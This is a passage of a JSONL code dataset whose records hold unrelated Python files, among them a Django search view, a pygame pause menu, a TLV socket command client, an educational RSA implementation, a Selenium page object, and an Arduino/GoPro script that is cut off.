render('search/search.html',\n {'query': query,\n 'keyword_results': keyword_results,\n 'results': results })\n","sub_path":"apps/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"485975979","text":"\n\nfrom xai.brain.wordbase.adjectives._grisly import _GRISLY\n\n#calss header\nclass _GRISLIEST(_GRISLY, ):\n\tdef __init__(self,): \n\t\t_GRISLY.__init__(self)\n\t\tself.name = \"GRISLIEST\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"grisly\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_grisliest.py","file_name":"_grisliest.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"70838678","text":"import pygame\n\nfrom UI.font_asset import FontAsset\nfrom UI.panel import ColourPanel\nfrom class_registrar import ClassRegistrar\n\n\n@ClassRegistrar.register(\"PauseMenu\")\nclass PauseMenu(ColourPanel):\n \"\"\"Pause menu UI.\"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.bind_children()\n self.resume_callback = None\n self.exit_callback = None\n\n def update(self, parent_rect, delta):\n \"\"\"Updates the main menu.\"\"\"\n super().update(parent_rect, delta)\n self.handle_input()\n\n def handle_input(self):\n \"\"\"Reads and handles input.\"\"\"\n mouse_pos = pygame.mouse.get_pos()\n self.propagate_mouse_pos(mouse_pos)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.exit_callback()\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n self.resume_callback()\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.resume_button.rect.collidepoint(mouse_pos):\n self.resume_callback()\n elif self.exit_button.rect.collidepoint(mouse_pos):\n self.exit_callback()\n\n def set_resume_callback(self, resume_callback):\n \"\"\"Sets the function to call when the resume button is clicked.\"\"\"\n self.resume_callback = resume_callback\n\n def set_exit_callback(self, exit_callback):\n \"\"\"Sets the function to call when the exit button is clicked.\"\"\"\n self.exit_callback = exit_callback\n","sub_path":"Samples/AsteroidShooter/src/pause_menu.py","file_name":"pause_menu.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"338298780","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nClient part of IP communicator.\n\"\"\"\n\nimport socket\nimport sys\nimport os\nfrom xdrlib import Packer, Unpacker\n\n\nclass TLV(object):\n def __init__(self):\n pass\n\n @staticmethod\n def compute_tlv(tag, message):\n packer = Packer()\n packer.pack_uint(tag)\n packer.pack_string(message)\n return packer.get_buffer()\n\n @staticmethod\n def is_tag_full(wrapped_message):\n unpacker = Unpacker(wrapped_message)\n try:\n unpacker.unpack_uint()\n unpacker.unpack_string()\n except EOFError:\n return False\n return True\n\n @staticmethod\n def get_tlv(wrapped_message):\n unpacker = Unpacker(wrapped_message)\n tag = unpacker.unpack_uint()\n message = unpacker.unpack_string()\n pos = unpacker.get_position()\n buff = unpacker.get_buffer()\n rest = buff[pos:]\n return tag, message, rest\n\n\nclass CommunicatorClient(object):\n\n def __init__(self):\n self.__msg_error_establish_connection = \"Couldn't establish connection to the server.\"\n self.__usage = \"Usage: %s \" % os.path.basename(sys.argv[0])\n self.__example = 
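The `search` view above returns `render('search/search.html', {...})`, but `django.shortcuts.render` requires the request as its first positional argument. A minimal sketch of the view's return with that argument restored:

```python
from django.shortcuts import render

def search(request):
    query = request.GET.get("q", "")
    keyword_results = results = []
    # ... same InstructorCourse filtering as above ...
    return render(request, "search/search.html",
                  {"query": query,
                   "keyword_results": keyword_results,
                   "results": results})
```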
\"Example: %s 127.0.0.1:5001 ls -al\" % os.path.basename(sys.argv[0])\n\n self.__host_name = \"\"\n self.__host_port = 0\n self.__received_package_size = 4096\n self.__external_command = []\n\n self.__tag_cmd = 1 # command line tag\n self.__tag_end_cmd = 2 # end command line tag\n self.__tag_finish_com = 3 # finish communication between client/server tag\n self.__tag_response = 4 # response tag\n\n def __parse_cmd(self):\n if len(sys.argv) < 3:\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__usage)\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__example)\n exit()\n connection_list = sys.argv[1].split(\":\")\n if len(connection_list) != 2:\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__usage)\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__example)\n exit()\n try:\n self.__host_name = connection_list[0]\n self.__host_port = int(connection_list[1])\n except ValueError:\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__usage)\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__example)\n exit()\n self.__external_command = sys.argv[2:]\n\n @staticmethod\n def __print_msg(msg):\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n def __communicate(self):\n skt = socket.socket()\n try:\n skt.connect((self.__host_name, self.__host_port))\n except socket.error as why:\n CommunicatorClient.__print_msg(\"%s. Reason: '%s'.\\n\" % (self.__msg_error_establish_connection, why.args[1]))\n return\n\n for cmd in self.__external_command:\n msg = TLV.compute_tlv(self.__tag_cmd, cmd)\n skt.send(msg)\n msg = TLV.compute_tlv(self.__tag_end_cmd, \"\")\n skt.send(msg)\n # receive data\n server_msg = str(skt.recv(self.__received_package_size))\n while not TLV.is_tag_full(server_msg):\n server_msg += str(skt.recv(self.__received_package_size))\n tag, msg, rest = TLV.get_tlv(server_msg)\n while rest or tag is not self.__tag_finish_com:\n CommunicatorClient.__print_msg(msg)\n server_msg = rest\n while not TLV.is_tag_full(server_msg):\n server_msg += str(skt.recv(self.__received_package_size))\n tag, msg, rest = TLV.get_tlv(server_msg)\n skt.close()\n\n def execute(self):\n self.__parse_cmd()\n self.__communicate()\n\n\ndef main():\n cc = CommunicatorClient()\n cc.execute()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"87526752","text":"#!/usr/bin/env python\n\n\"\"\"\n============================================================\n>> Autor: Johann Gordillo\n>> Email: jgordillo@ciencias.unam.mx\n>> Fecha: 20/05/2020\n============================================================\nImplementación sencilla del Criptosistema de clave pública\nde Rivest-Shamir-Adleman (RSA).\n\nNota:\nEste programa fue diseñado únicamente con fines educativos\ny no se recomienda su uso en seguridad informática.\n\nCopyright (c) 2020 Johann Gordillo\n============================================================\n\"\"\"\n\nfrom random import randrange, randint, getrandbits\nfrom math import gcd\n\n\ndef generate_prime_number(min_length=50, max_length=70):\n \"\"\"Genera un número primo aleatorio.\n\n >> Argumentos:\n length -- int -- Número de dígitos.\n \n >> Regresa:\n Un número primo con la cantidad de dígitos\n indicada.\n \"\"\"\n if max_length < min_length:\n error_msg = \"La longitud máxima de dígitos es menor que la mínima.\"\n raise ValueError(error_msg)\n \n p = 0\n\n while not is_prime(p, 2):\n # Generamos un entero 
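A round-trip sketch for the TLV helpers in the client above. Note that on Python 3, `Packer.pack_string` expects bytes, so text must be encoded first; `xdrlib` itself is deprecated since Python 3.11 and removed in 3.13.

```python
from xdrlib import Packer, Unpacker

packer = Packer()
packer.pack_uint(1)                    # the client's command-line tag
packer.pack_string(b"ls -al")          # bytes, not str, on Python 3
wire = packer.get_buffer()

unpacker = Unpacker(wire)
print(unpacker.unpack_uint(), unpacker.unpack_string())   # 1 b'ls -al'
```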
aleatorio.\n p = randint(pow(10, min_length - 1), pow(10, max_length) - 1)\n\n return p\n\n\ndef is_prime(n, k):\n \"\"\"Función que nos dice si un entero dado es un \n número primo (probable) o no.\n\n Es una implementación de la prueba de primalidad \n de Miller-Rabin.\n\n Se ha elegido esta implementación sobre la\n prueba de primalidad de Fermat, ya que en ésta \n los números de Carmichael no son un problema.\n\n Más información en:\n https://en.wikipedia.org/wiki/Miller-Rabin_primality_test\n\n >> Argumentos:\n n -- int -- Numero a probar.\n k -- int -- Numero de pruebas a realizar.\n\n >> Regresa:\n True si 'n' es primo. False si no.\n \"\"\"\n # 2 y 3 son los primeros primos positivos.\n if n == 2 or n == 3:\n return True\n\n # Verificamos que 'n' no sea par.\n if n <= 1 or n % 2 == 0:\n return False\n\n # Necesitamos encontrar 'r', 's' tales que:\n # (n - 1) = r * (2 ^ s), con 'r' impar.\n s = 0\n r = n - 1\n while r & 1 == 0:\n s += 1\n r //= 2\n \n # Realizaremos 'k' pruebas.\n for _ in range(k):\n # Elegimos un entero 'a' aleatorio en [2, n - 2].\n a = randrange(2, n - 1)\n\n # Calculamos b = (a ^ r) (mód n)\n b = pow(a, r, n)\n\n # Si 'b' es congruente con +1 ó -1 (mód n), es problable primo.\n if b == 1 or b == n - 1:\n continue\n\n # De otra manera, elevamos b al cuadrado (mód n) mientras\n # el algoritmo no culmine con un caso en el que 'b' no sea primo.\n else:\n i = 1\n while i < s and b != n - 1:\n b = pow(b, 2, n)\n if b == 1:\n return False\n i += 1\n if b != n - 1:\n return False\n \n # Si no falla ninguna de las pruebas, regresamos True.\n return True\n\n\ndef extended_gcd(n, m):\n \"\"\"Implementación del Algoritmo de Euclides Extendido.\n\n >> Argumentos:\n a --- int --- Un entero cualquiera.\n b --- int --- Un entero cualquiera.\n\n >> Regresa:\n Una tupla (g, s, t) donde g es el máximo común divisor\n de 'n' y 'm', y se tiene que g = ns + mt.\n \"\"\"\n if n == 0 : \n return (m, 0, 1)\n \n g, s1, t1 = extended_gcd(m % n, n) \n \n s = t1 - (m // n) * s1 \n t = s1 \n \n return (g, s, t)\n\n\ndef mod_multiplicative_inverse(n, m):\n \"\"\"Devuelve el inverso multiplicativo de n modulo m.\n Se da por hecho que n es invertible en Zm.\n\n >> Argumentos:\n n --- int --- Un entero invertible en Zm.\n m --- int --- Un entero cualquiera.\n \n >> Regresa:\n El inverso de n en el anillo Zm.\n \"\"\"\n # Se tiene que gcd(n, m) = ns + mt\n g, s, _ = extended_gcd(n, m)\n inverse = s % m\n return inverse\n\n\ndef generate_keys(p, q):\n \"\"\"Genera las claves pública y privada del algoritmo.\n\n >> Argumentos:\n p --- int --- Un número primo\n q --- int --- Un número primo.\n\n >> Regresa:\n Una tupla con las claves pública y privada.\n \"\"\"\n n = p * q\n\n # Función phi de Euler aplicada a n.\n # Como p y q son primos, phi(n) = (p - 1) * (q - 1).\n phi = (p - 1) * (q - 1)\n\n # Obtenemos un entero 'e' coprimo con phi tal que:\n # 1 < e < phi.\n e = randrange(2, phi)\n while gcd(e, phi) != 1:\n e = randrange(3, phi)\n\n # Generamos una llave privada 'd' tal que:\n # (e * d) sea congruente con 1 (mód phi).\n d = mod_multiplicative_inverse(e, phi)\n\n public_key = (n, e)\n private_key = d\n\n return (public_key, private_key)\n\n\ndef encrypt(public_key, msg):\n \"\"\"Funcion encrypt.\n\n >> Argumentos:\n public_key --- tuple[int] --- La clave pública.\n msg --- string --- Una cadena con el mensaje.\n\n >> Regresa:\n ciphertext --- string --- Una cadena con el mensaje\n cifrado.\n \"\"\"\n n, e = public_key\n ciphertext = [pow(m, e, n) for m in text_to_numbers(msg)]\n return 
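A quick identity check for the helpers above, assuming the module is importable: `extended_gcd(n, m)` returns `(g, s, t)` satisfying Bezout's identity `g = n*s + m*t`, and the modular inverse it yields satisfies `(n * inv) % m == 1`.

```python
g, s, t = extended_gcd(240, 46)
assert g == 240 * s + 46 * t             # Bezout identity; g == 2 here

inv = mod_multiplicative_inverse(7, 40)  # 7 * 23 == 161 == 4*40 + 1
assert (7 * inv) % 40 == 1
print(g, inv)                            # -> 2 23
```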
ciphertext\n\n\ndef decrypt(ciphertext, keys):\n \"\"\"Funcion Decrypt.\n\n >> Argumentos:\n ciphertext --- string --- Una cadena.\n d --- int --- La llave privada.\n n --- int --- El numero de entrada.\n\n >> Regresa:\n msg --- string --- Una cadena con el\n mensaje descifrado.\n \"\"\"\n public_key, private_key = keys\n n, e = public_key \n msg = [pow(c, private_key, n) for c in ciphertext]\n return numbers_to_text(msg)\n\n\ndef numbers_to_text(nums):\n \"\"\"Pasa una lista de numeros a una cadena\n de texto.\n\n >> Argumentos:\n nums --- Una lista de numeros.\n\n >> Regresa:\n text --- Una cadena de texto.\n \"\"\"\n text = ''.join([chr(n) for n in nums])\n return text\n\n\ndef text_to_numbers(text):\n \"\"\"Pasa una lista de caracteres a una lista\n de números enteros.\n\n >> Argumentos:\n nums --- Una lista de carácteres.\n\n >> Regresa:\n text --- Una lista de enteros.\n \"\"\"\n nums = [ord(c) for c in text]\n return nums\n","sub_path":"rsa/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574788743","text":"from selenium.common.exceptions import (NoSuchElementException,\n\tStaleElementReferenceException, WebDriverException)\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver import ActionChains as AC\nfrom page import Page\nfrom components import menu\nfrom components import header\nimport time\nimport main\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait as WDW\n\nclass EmployeeViewPage(Page):\n\turl_tail = \"employee/\" #i.e. https://ppay11.herokuapp.com/employee/ead0ade1\n\tdynamic = True\n\n\tdef load(self):\n\t\ttry:\n\t\t\tself.admin_options = ['none', 'manager', 'executive']\n\t\t\tself.load_tabs()\n\t\t\tif self.selected_tab == 'info':\n\t\t\t\tself.load_information()\n\t\t\t\t\t# employee_name\n\t\t\t\t\t# edit_button\n\t\t\t\t\t# employee_id\n\t\t\t\t\t# enroll_date\n\t\t\t\t\t# status\n\t\t\t\t\t# election\n\t\t\t\t\t# edit form\n\t\t\t\t# print('loaded info')\n\t\t\telif self.selected_tab == 'history':\n\t\t\t\tself.load_history()\n\t\t\t\t\t# Table with entries\n\t\t\t\t\t\t# election_amt\n\t\t\t\t\t\t# election_date\n\t\t\t\t\t\t# election_pdf\n\t\t\t\t# print('loaded history')\n\t\t\telif self.selected_tab == 'permissions':\n\t\t\t\tself.load_permissions()\n\t\t\t\t\t# admin_radios\n\t\t\t\t# print('loaded perms')\n\t\t\tself.menu = menu.SideMenu(self.driver)\n\t\t\tself.header = header.PrivateHeader(self.driver)\n\t\t\treturn True\n\t\texcept (NoSuchElementException, StaleElementReferenceException,\n\t\t\t\tWebDriverException) as e:\n\t\t\t#print(str(e))\n\t\t\treturn False\n\n\tdef is_editing(self):\n\t\ttry:\n\t\t\tel = self.driver.find_element_by_class_name('sm-employee-edit-form')\n\t\t\treturn True\n\t\texcept NoSuchElementException:\n\t\t\treturn False\n\n\tdef load_tabs(self):\n\t\t# elements always visible\n\t\tfind_by = self.driver.find_element_by_id\n\n\t\tself.info_tab = self.driver.find_element_by_id(\"employee_info\")\n\t\tself.permissions_tab = self.driver.find_element_by_id(\"employee_permissions\")\n\n\t\t# history tab does not exist for admin only users\n\t\ttry:\n\t\t\tself.history_tab = self.driver.find_element_by_id(\"employee_history\")\n\t\texcept NoSuchElementException:\n\t\t\tself.history_tab = None\n\n\t\tself.selected_tab = self.current_tab()\n\t\t# if all(x != None for x in 
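An end-to-end sketch using the module above, with deliberately tiny primes so the numbers stay readable; real keys come from `generate_prime_number`, which draws 50-to-70-digit primes, and small moduli like this offer no security. Each character code must stay below `n = p*q` for the per-character `pow(m, e, n)` scheme to round-trip.

```python
p, q = 61, 53                                  # toy primes; n = 3233
public_key, private_key = generate_keys(p, q)

ciphertext = encrypt(public_key, "hola")
plaintext = decrypt(ciphertext, (public_key, private_key))
print(plaintext)                               # 'hola'
```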
(self.info_tab, self.history_tab)): #self.edit_button,self.employee_name)):\n\t\t# \treturn True\n\t\t# else:\n\t\t# \treturn False\n\n\t# def load_tabs(self):\n\t# \t# These should always be visible on employee_view page.\n\t# \tself.info_tab = self.driver.find_element_by_id(\"employee_info\")\n\t# \tself.history_tab = self.driver.find_element_by_id(\"employee_history\")\n\t# \tself.permissions_tab = self.driver.find_element_by_id(\"employee_permissions\")\n\t# \t# try:\n\t# \t# \tself.info_tab = self.driver.find_element_by_id(\"employee_info\")\n\t# \t# except (NoSuchElementException, StaleElementReferenceException) as e:\n\t# \t# \tself.info_tab = None\n\t# \t# \tprint('Failed to load info tab. \\n' + str(e))\n\t# \t# \treturn False\n\t# \t# try:\n\t# \t# \tself.history_tab = self.driver.find_element_by_id(\"employee_history\")\n\t# \t# except (NoSuchElementException, StaleElementReferenceException) as e:\n\t# \t# \tself.history_tab = None\n\n\t# \t# try:\n\t# \t# \tself.permissions_tab = self.driver.find_element_by_id(\"employee_permissions\")\n\t# \t# except NoSuchElementException:\n\t# \t# \tself.permissions_tab = None\n\t# \t# except Exception as e:\n\t# \t# \tprint(str(e))\n\t# \t# \treturn False\n\t# \t# return True\n\n########################## INFORMATION TAB ###############################\n\n\tdef load_information(self):\n\t\tif self.is_editing():\n\t\t\tself.load_edit_form()\n\t\t\t\t# id_input\n\t\t\t\t# name_inputs (first/last)\n\t\t\t\t# save button\n\t\telse:\n\t\t\tself.body = self.driver.find_element_by_tag_name('section')\n\t\t\tself.employee_name = self.try_load_name()\n\t\t\tself.edit_button = self.try_load_edit()\n\t\t\tself.load_default()\n\n\tdef try_load_edit(self):\n\t\ttry:\n\t\t\treturn self.body.find_element_by_tag_name('button')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_name(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_tag_name(\"h1\")\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef load_default(self):\n\t\t# visible when not editing\n\t\tself.info_table = self.try_load_info_table()\n\t\tself.id = self.try_load_id()\n\t\tself.status = self.try_load_status()\n\t\t#self.admin_role = self.try_load_admin_role()\n\t\tself.election = self.try_load_election()\n\t\tif all(x != None for x in (self.id,self.status,self.election)) or len(self.info_table.find_elements_by_tag_name('tr')) is 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef try_load_info_table(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_tag_name('tbody')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_id(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[0]\n\t\t\treturn row.find_element_by_tag_name('td')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_status(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[2]\n\t\t\treturn row.find_element_by_tag_name('td')\n\t\texcept (NoSuchElementException, IndexError):\n\t\t\treturn None\n\n\tdef try_load_election(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[3]\n\t\t\treturn row.find_element_by_tag_name('td')\n\t\texcept (NoSuchElementException, IndexError):\n\t\t\treturn None\n\n\tdef get_status(self):\n\t\t#Doesn't work when editing employee\n\t\treturn self.status.text\n\n\tdef load_edit_form(self):\n\t\t# elements only visible when editing\n\t\tif not self.is_editing():\n\t\t\t#print('not editing?')\n\t\t\tself.edit_form = 
None\n\t\t\tself.id_input = None\n\t\t\tself.first_name = None\n\t\t\tself.last_name = None\n\t\t\tself.save_changes = None\n\t\t\treturn False\n\t\telse:\n\t\t\t#print('editing')\n\t\t\tcss = 'sm-employee-edit-form'\n\t\t\tself.edit_form = self.driver.find_element_by_class_name(css)\n\t\t\ttry:\n\t\t\t\tself.id_input = self.body.find_elements_by_tag_name('input')[0]\n\t\t\t\tself.first_name = self.body.find_elements_by_tag_name('input')[1]\n\t\t\t\tself.last_name = self.body.find_elements_by_tag_name('input')[2]\n\t\t\texcept IndexError:\n\t\t\t\tself.id_input = None\n\t\t\t\tself.first_name = self.body.find_elements_by_tag_name('input')[0]\n\t\t\t\tself.last_name = self.body.find_elements_by_tag_name('input')[1]\n\t\t\texcept Exception:\n\t\t\t\t#print(str(e))\n\t\t\t\treturn False\n\t\t\tself.save_changes = self.edit_form.find_element_by_tag_name('button')\n\t\t\treturn True\n\n\tdef edit(self):\n\t\t\"\"\"Click edit button and return status of loading edit form\"\"\"\n\t\tif self.current_tab() != 'information':\n\t\t\tself.move_to_el(self.info_tab)\n\t\t\tself.load()\n\n\t\tself.move_to_el(self.edit_button)\n\t\t# Look for primary button (will be disabled initally)\n\t\t# should always be there no matter what user's role/status is\n\t\tWDW(self.driver, 10).until(\n\t\t\tEC.presence_of_element_located((By.CLASS_NAME, 'primaryButton')))\n\t\tself.load()\n\n\tdef set_id(self,new_id):\n\t\tif not self.is_editing():\n\t\t\tself.edit()\n\t\t\t#print('clicked edit')\n\t\ttry:\n\t\t\tself.id_input.clear()\n\t\t\tself.id_input.send_keys(new_id)\n\t\t\ttime.sleep(.2)\n\t\t\treturn True\n\t\texcept NameError:\n\t\t\treturn False\n\n\tdef get_id(self):\n\t\t# get ID from self.id. self.id_input if editing\n\t\tif self.is_editing():\n\t\t\t#print('editing')\n\t\t\treturn self.id_input.get_attribute('value')\n\t\telse:\n\t\t\tprint('not editing')\n\t\t\treturn self.id.text\n\n\tdef set_first_name(self, name):\n\t\tif not self.is_editing():\n\t\t\tself.edit()\n\t\ttry:\n\t\t\tself.first_name.clear()\n\t\t\tself.first_name.send_keys(name)\n\t\t\ttime.sleep(.2)\n\t\t\treturn True\n\t\texcept NameError:\n\t\t\treturn False\n\n\tdef get_first_name(self):\n\t\tif self.is_editing():\n\t\t\treturn self.first_name.get_attribute('value')\n\t\telse:\n\t\t\treturn self.employee_name.split(' ')[0]\n\n\tdef set_last_name(self, name):\n\t\tif not self.is_editing():\n\t\t\tself.edit()\n\t\ttry:\n\t\t\tself.last_name.clear()\n\t\t\tself.last_name.send_keys(name)\n\t\t\ttime.sleep(.2)\n\t\t\treturn True\n\t\texcept NameError:\n\t\t\treturn False\n\n\tdef get_last_name(self):\n\t\tif self.is_editing():\n\t\t\treturn self.last_name.get_attribute('value')\n\t\telse:\n\t\t\treturn self.employee_name.split(' ', 1)[1]\n\t\t\t#Return everything after 1st name (denoted by space)\n\n\tdef click_save_changes(self):\n\t\t\"\"\"Click save, load stuff, return True if stuff loads\n\t\treturn false if not editing, or save button disabled (no changes)\"\"\"\n\t\tif self.is_editing() and self.save_changes.is_enabled():\n\t\t\tself.save_changes.click()\n\t\t\tWDW(self.driver, 10).until_not(EC.presence_of_element_located((By.CLASS_NAME, 'primaryButton')))\n\t\t\treturn self.load()\n\t\t\t# return self.load_default()\n\t\treturn False\n\n\n###################### HISTORY TAB ###############################\n\n\tdef load_history(self):\n\t\thistory_table = self.driver.find_element_by_tag_name('table')\n\n\tdef load_first_entry(self):\n\t\ttry:\n\t\t\tentry = self.history_table.find_elements_by_tag_name('tr')[0]\n\t\t\tself.election_amt = 
entry.find_elements_by_tag_name('td')[0]\n\t\t\tself.election_date = entry.find_elements_by_tag_name('td')[1]\n\t\t\tself.election_pdf = entry.find_elements_by_tag_name('td')[2]\n\t\t\treturn True\n\t\texcept Exception:\n\t\t\tself.election_amt = None\n\t\t\tself.election_date = None\n\t\t\tself.election_pdf = None\n\t\t\treturn False\n\n\n######################## PERMISSIONS TAB #############################\n\n\tdef load_permissions(self):\n\t\tself.radio_group = self.driver.find_element_by_id('permission_group')\n\t\tself.admin_radios = self.radio_group.find_elements_by_tag_name('input')\n\t\t#self.admin_none = self.admin_radios.find_elements_by_tag_name('input')[0]\n\t\t#self.admin_manager = self.admin_radios.find_elements_by_tag_name('input')[1]\n\t\t#self.admin_executive = self.admin_radios.find_elements_by_tag_name('input')[2]\n\n\tdef try_load_admin_role(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[4]\n\t\t\ttd = row.find_element_by_tag_name('td')\n\t\t\treturn td.text.lower()\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef role_to_index(self, admin_role):\n\t\t# Return index of radio button given role (none, manager, executive)\n\t\treturn self.admin_options.index(admin_role)\n\n\tdef current_radio(self):\n\t\t# Return text corresponding to currently selected radio button\n\t\tfor i, radio in enumerate(self.admin_radios):\n\t\t\tif radio.is_selected():\n\t\t\t\treturn self.admin_options[i]\n\n\tdef get_admin_role_radio(self):\n\t\t# Return admin role according to radio buttons (edit mode)\n\t\treturn self.current_radio()\n\n\tdef get_admin_role(self):\n\t\t# Return admin role according to text (not editing)\n\t\t#click permissions tab, get highlighted radio, translate to role\n\t\tself.permissions_tab.click()\n\t\tself.load()\n\t\treturn self.current_radio()\n\t\t'''if self.is_editing():\n\t\t\tself.click_edit()\n\t\treturn self.admin_role'''\n\n\tdef set_admin_role(self, admin_role):\n\t\t# Will not work for yourself (cannot edit own role)\n\t\tif self.current_tab() != 'permissions':\n\t\t\tself.permissions_tab.click()\n\t\t\tself.load()\n\t\tif admin_role in self.admin_options:\n\t\t\t# permission checkboxes should always be visible now (in the right tab)\n\t\t\t# make sure role checkboxes are visible and above save button\n\t\t\t# if not main.is_desktop():\n\t\t\t# \tself.scroll_to_top() # start at top of page\n\t\t\t# \tel_bottom = self.get_el_location(self.admin_radios[2], 'bottom')\n\t\t\t# \twindow_height = self.get_window_height()\n\t\t\t# \t# add 48 for save button (legacy)\n\t\t\t# \tscroll_distance = el_bottom - window_height\n\t\t\t# \tself.move('down', scroll_distance)\n\n\t\t\t# toggle radio\n\t\t\t# print(self.admin_radios)\n\t\t\tself.admin_radios[self.role_to_index(admin_role)].click()\n\n\t\t\t# Need some kind of pause to let stuff load or you'll get WebDriverException.\n\t\t\t# Not sure if there's a WDWait that makes sense.\n\t\t\ttime.sleep(.4)\n\t\telse:\n\t\t\traise Exception(\"Unexpected admin role: \" + str(admin_role))\n\n\tdef role_is_editable(self, index):\n\t\treturn self.admin_radios[index].is_enabled()\n\n\tdef current_tab(self):\n\t\t\"\"\"Determine selected tab by its text color\"\"\"\n\t\tselected = \"rgba(56, 217, 244,\"\n\t\tif selected in self.info_tab.value_of_css_property('color'):\n\t\t\treturn 'info'\n\t\telif self.history_tab is not None and selected in self.history_tab.value_of_css_property('color'):\n\t\t\treturn 'history'\n\t\telif self.permissions_tab is not None and 
selected in self.permissions_tab.value_of_css_property('color'):\n\t\t\treturn 'permissions'\n\t\traise Exception(\"Unexpected tab behavior!\")","sub_path":"testing/pages/employee_view.py","file_name":"employee_view.py","file_ext":"py","file_size_in_byte":11945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"457518222","text":"\"\"\"Script for testing the Game.solve() function, or for generating solutions.\"\"\"\nimport os\nfrom Game import Game, GameWorld\n\nsave_world = 1\ndo_solve = False\nsolve_all = 0 # 0 to solve only unsolved\nprint_stats = 1\n\nWORLD_DIR = \"Worlds\"\nworld_files = sorted(os.listdir(WORLD_DIR))\n\nif print_stats:\n for world_file in world_files:\n world = GameWorld(world_file, \"Worlds\")\n levels = world.levels\n n_unsolved, n_solved_optimally, n_solved_manually, = 0, 0, 0\n for level_i, solution in enumerate(world.solutions):\n if solution[0] is None:\n n_unsolved += 1\n # print(world.level_ids[level_i])\n elif \"cost-optimal\" in solution[1]:\n n_solved_optimally += 1\n elif \"manual moves\" in solution[1] or \"manually solved\" in solution[1]:\n n_solved_manually += 1\n else:\n print(f\"unintelligible solution info: {solution[1]}\")\n print(f'{world_file} contains {n_unsolved} unsolved, {n_solved_optimally} optimally solved, and ' +\n f'{n_solved_manually} (at least partially) manually-solved puzzles.')\n\n\nif do_solve:\n for world_file in world_files:\n world = GameWorld(world_file, \"Worlds\")\n levels = world.levels\n for level_i in range(len(levels)):\n level_id = world.level_ids[level_i]\n full_id = f\"{world_file}#{level_id}\"\n game = Game(levels[level_i], level_id, False, world.solutions[level_i])\n if solve_all or game.solution_state is None:\n game.solve()\n msg1 = f\"{full_id}: {game.solution_info}\"\n if game.solution_state:\n msg2 = world.check_and_update_solution(level_i, (game.solution_string(), game.solution_info))\n if save_world:\n world.save()\n else:\n msg2 = \"\"\n print(f\"{msg1:110} {msg2}\")\n\n","sub_path":"test_solve.py","file_name":"test_solve.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"538355657","text":"from time import sleep\nimport serial\nfrom goprocam import GoProCamera\nfrom goprocam import constants\n\n\nser = serial.Serial('/dev/ttyACM0', 9600) # Establish the connection on a specific port\ncounter = 32 # Below 32 everything in ASCII is gibberish\n\ndef writeToArduino(text):\n global ser\n returnObject = \"\"\n ser.write(bytes(text,'utf-8')) # Convert the decimal number to ASCII then send it to the Arduino\n return returnObject \n\ndef readFromArduino():\n global ser\n returnObject = bytes(\"\",'utf-8')\n for x in range(0,3):\n counter = 32 # Below 32 everything in ASCII is gibberish\n returnObject = returnObject + ser.readline() # Read the newest output from the Arduino\n sleep(.2) # Delay for one tenth of a second\n if counter == 255:\n counter = 32\n \n return returnObject\n\ndef takePicture():\n gpCam = GoProCamera.GoPro()\n TIMER=4\n gpCam.downloadLastMedia(gpCam.take_photo(TIMER)) #take a photo in 4 seconds and download it.\n print(\"Picture has been taken and downloaded.\")\n\n\nwhile (True):\n userInput = input(\":\")\n if(userInput == \"raise\" or userInput == \"lower\" or userInput == \"r\" or userInput == \"l\"):\n print(writeToArduino(userInput))\n for x in readFromArduino().split(bytes('\\n','utf-8')):\n print(x[0:-1])\n if(userInput == \"photo\"):\n 
